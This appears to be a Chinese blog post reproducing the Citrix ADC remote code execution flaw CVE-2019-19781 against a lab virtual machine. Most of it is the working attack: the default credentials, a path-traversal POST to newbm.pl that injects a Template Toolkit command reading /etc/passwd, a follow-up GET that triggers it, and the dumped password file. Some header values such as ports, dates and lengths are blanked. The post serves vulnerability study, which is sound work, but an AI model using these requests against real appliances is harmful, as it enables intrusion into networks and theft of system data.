CVE-2019-19781 Citrix ADC 远程代码执行漏洞复现
CVE-2019-19781 Citrix ADC 远程代码执行漏洞复现
用户5878089
发布于 2020-02-13 20:46:49
发布于 2020-02-13 20:46:49
0x01 下载文件 NSVPX-ESX-13.0-47.22_nc_64.zip
#### https://www.citrix.com/downloads/citrix-gateway/
配置静态ip
0x02 nmap 扫描
Scanning 192.168.3.244 [ ports]
Discovered open port /tcp on 192.168.3.244
Discovered open port /tcp on 192.168.3.244
Discovered open port /tcp on 192.168.3.244
没有安装证书
http://192.168.3.244/
default password: nsroot/nsroot
0x03 上传 xml
POST /V**/../V**s/portal/scripts/newbm.pl HTTP/1.1
Host: 192.168.3.244
User-Agent: 1
Connection: close
NSC_USER: ../../../netscaler/portal/templates/jas502n
NSC_NONCE: nsroot
Content-Length: 97
url=http://example.com&title=jas502n&desc=[% template.new('BLOCK' = 'print `cat /etc/passwd`') %]
HTTP/1.1 200 OK
Date: Sat, 11 Jan 2020 06:36:44 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Last-Modified: Sat, 11 Jan 2020 06:36:44 GMT
ETag: W/"87-59bdd52283e00"
Accept-Ranges: bytes
Content-Length: 135
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<HTML>
<BODY>
<SCRIPT language=javascript type=text/javascript>
//parent.window.ns_reload();
window.close();
</SCRIPT>
</BODY>
</HTML>
0x04 执行命令
GET /V**/../V**s/portal/jas502n.xml HTTP/1.1
Host: 192.168.3.244
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
NSC_USER: nsroot
NSC_NONCE: nsroot
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
HTTP/1.1 OK
Date: Sat, Jan :: GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Pragma: no-cache
Cache-control: no-cache
X-XSS-Protection: ; mode=block
X-Content-Type-Options: nosniff
Keep-Alive: timeout=, max=
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-
Expires: Sat, Jan :: GMT
Content-Length:
# $FreeBSD: release/8.4./etc/master.passwd -- ::Z rwatson $
#
root:*:::Charlie &:/root:/usr/bin/bash
nsroot:*:::Netscaler Root:/root:/netscaler/nssh
daemon:*:::Owner of many system processes:/root:/usr/sbin/nologin
operator:*:::System &:/:/usr/sbin/nologin
bin:*:::Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:::Tty Sandbox:/:/usr/sbin/nologin
kmem:*:::KMem Sandbox:/:/usr/sbin/nologin
games:*:::Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:::News Subsystem:/:/usr/sbin/nologin
man:*:::Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:::Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:::Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:::Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:::Bind Sandbox:/:/usr/sbin/nologin
proxy:*:::Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:::pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:::dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:::UUCP pseudo-user:/var/spool/uucppublic:/usr/sbin/nologin
pop:*:::Post Office Owner:/nonexistent:/usr/sbin/nologin
auditdistd:*:::Auditdistd unprivileged user:/var/empty:/usr/sbin/nologin
www:*:::World Wide Web Owner:/nonexistent:/usr/sbin/nologin
hast:*:::HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:*:::Unprivileged user:/nonexistent:/usr/sbin/nologin
nsmonitor:*:::Netscaler Monitoring user:/var/nstmp/monitors:/usr/sbin/nologin
undef error - Attempt to bless into a reference at /usr/local/lib/perl5/site_perl/5.14.2/mach/Template/Document.pm line 92.
undef error - Attempt to bless into a reference at /usr/local/lib/perl5/site_perl/5.14.2/mach/Template/Document.pm line 92.
参考链接
https://www.mdsec.co.uk/2020/01/deep-dive-to-citrix-adc-remote-code-execution-cve-2019-19781/
本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2020-01-12,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录